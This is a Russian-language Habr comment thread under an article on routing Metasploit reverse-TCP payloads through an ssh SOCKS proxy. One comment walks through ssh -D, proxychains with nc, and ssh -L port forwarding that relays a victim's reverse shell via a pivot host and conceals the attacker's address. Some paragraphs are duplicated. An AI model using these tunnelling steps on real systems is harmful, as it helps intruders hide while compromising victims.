Комментарии 5
Нужно быть очень не хилым спецом, чтоб понять что в приведённых скринах консолек происходит. Потому раскрыли бы это поподробнее.
Я только насчёт первой картинки скажу:
ssh root@192.168.0.2 -D 8181 — это мы открыли на локальном хосте порт 8181, который будет в качестве прокси использовать комп с адресом 192.168.0.2. Сам прокси доступен атакующему по адресу 127.0.0.1:8181, доступ к этому порту из-вне закрыт
netstat -ntlp | grep 8181 | tr -s " " — это мы проверили, что после предыдущей команды (
ssh root@192.168.0.2 -D 8181) у нас на локалхосте действительно заработал и открылся порт 127.0.0.1:8181 и открыт он процессом ssh
cat /etc/proxychains.conf | grep 8181 — выводим часть конфига proxychains, в которой видно, что он будет в качестве прокси использовать 127.0.0.1:8181
sudo /bin/proxychains nc 127.0.0.1:4444 — запускаем коннект к 127.0.0.1:4444 через proxychains (который, как видно по приведённому выше конфигу, использует прокси 127.0.0.1:8181, который, как написано ещё чуть выше, был открыть через ssh для туннелирования трафика)
Вот такая вот история, на подобии: «игла в яйце, яйцо в утке… » и т.д.
Я только насчёт первой картинки скажу:
ssh root@192.168.0.2 -D 8181 — это мы открыли на локальном хосте порт 8181, который будет в качестве прокси использовать комп с адресом 192.168.0.2. Сам прокси доступен атакующему по адресу 127.0.0.1:8181, доступ к этому порту из-вне закрыт
netstat -ntlp | grep 8181 | tr -s " " — это мы проверили, что после предыдущей команды (
ssh root@192.168.0.2 -D 8181) у нас на локалхосте действительно заработал и открылся порт 127.0.0.1:8181 и открыт он процессом ssh
cat /etc/proxychains.conf | grep 8181 — выводим часть конфига proxychains, в которой видно, что он будет в качестве прокси использовать 127.0.0.1:8181
sudo /bin/proxychains nc 127.0.0.1:4444 — запускаем коннект к 127.0.0.1:4444 через proxychains (который, как видно по приведённому выше конфигу, использует прокси 127.0.0.1:8181, который, как написано ещё чуть выше, был открыть через ssh для туннелирования трафика)
Вот такая вот история, на подобии: «игла в яйце, яйцо в утке… » и т.д.
И ещё немного подробностей для тех, кто не осилил много букаф и скриншотов:
для атаки Metasploit будет использовать как прокси 127.0.0.1:8181 (который для жертвы будет выглядеть как 192.168.0.2). Собственно, для этого мы и поднимаем прокси через адрес 192.168.0.2 (ssh root@192.168.0.2 -D 8181)
Но реверс коннект также должен придти атакующему от жертвы транзитом через 192.168.0.2 (чтоб жертва всё время знала только о некоем 192.168.0.2 и не знала реальный адрес атакующего). Поэтому на 192.168.0.2 необходимо открыть доступный из-вне порт 4444 (192.168.0.2:4444). Коннекты на этот порт будут пробрасываться атакующему на открытый у атакующего порт 53.
Для этого в консоли сервера, который будет использоваться как прокси выполняем: ssh -L 4444: Атакующий:53 root@127.0.0.1 -g
для атаки Metasploit будет использовать как прокси 127.0.0.1:8181 (который для жертвы будет выглядеть как 192.168.0.2). Собственно, для этого мы и поднимаем прокси через адрес 192.168.0.2 (ssh root@192.168.0.2 -D 8181)
Но реверс коннект также должен придти атакующему от жертвы транзитом через 192.168.0.2 (чтоб жертва всё время знала только о некоем 192.168.0.2 и не знала реальный адрес атакующего). Поэтому на 192.168.0.2 необходимо открыть доступный из-вне порт 4444 (192.168.0.2:4444). Коннекты на этот порт будут пробрасываться атакующему на открытый у атакующего порт 53.
Для этого в консоли сервера, который будет использоваться как прокси выполняем: ssh -L 4444: Атакующий:53 root@127.0.0.1 -g
А вообще — спасибо что перевели. Я кое-что для себя новое открыл. Жаль, что многие не смогли оценить полезности статьи. Но я свой плюс уже отдал
В своё время искал подобный материал на русском и видимо Вы создали его первый, за что Вам огромное человеческое спасибо, теперь остальным будет по проще. Можно кстати ещё абзац про Armitage добавить, там тоже самое.
Зарегистрируйтесь на Хабре, чтобы оставить комментарий
Использование ssh socks прокси совместно с MSF Reverse TCP Payloads